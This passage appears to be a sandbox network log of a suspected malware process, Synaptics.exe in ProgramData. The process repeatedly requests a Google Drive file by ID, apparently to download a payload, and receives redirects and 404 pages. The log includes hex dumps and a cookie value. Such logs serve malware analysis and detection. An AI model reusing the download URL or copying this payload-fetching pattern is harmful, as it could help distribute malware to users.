                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.449828142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5htGShh6kvz7wMa-32dSzHj10a-8EKXHMpU52ygmdbWUJFHbqdiVVEn_tdd39drgIr
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-IYmIZvZ76YfZzW5S9Z7iUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:20:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 56 65 54 43 6b 78 64 67 4d 46 47 65 63 39 50 68 48 37 43 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="PVeTCkxdgMFGec9PhH7CSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:20:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.449830142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5wUy6ykN5pwT7khyQDaCCQHViKV3e01_aXLPjVhDnUC7C9VCPARsWMtSr0HyDFc2Bk5mghhJI
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cOrI6xM3zGjHgLysfm5l4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 35 4a 48 74 30 6a 35 79 57 30 42 39 6f 41 54 77 36 6e 37 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="N5JHt0j5yW0B9oATw6n7FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.449839142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:45 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RkLU1GlTsYaRA2TUZZe0Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.449840142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:45 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EXUXbdtuHdIw-s233N-7ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.449849142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:49 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-e2JBVZYkRLbfCGRAFBYOaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.449848142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:49 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SBbFc1bmj4qkG3brCtGhaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.449857142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:53 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:53 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rES5CrLmXgxn1WaO-AuxQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.449858142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:53 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:53 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jr9f-y2eDV1wVUbze7eS-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.449867142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:57 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AZBNuhrRkLyau95PF6SN5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.449868142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:57 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
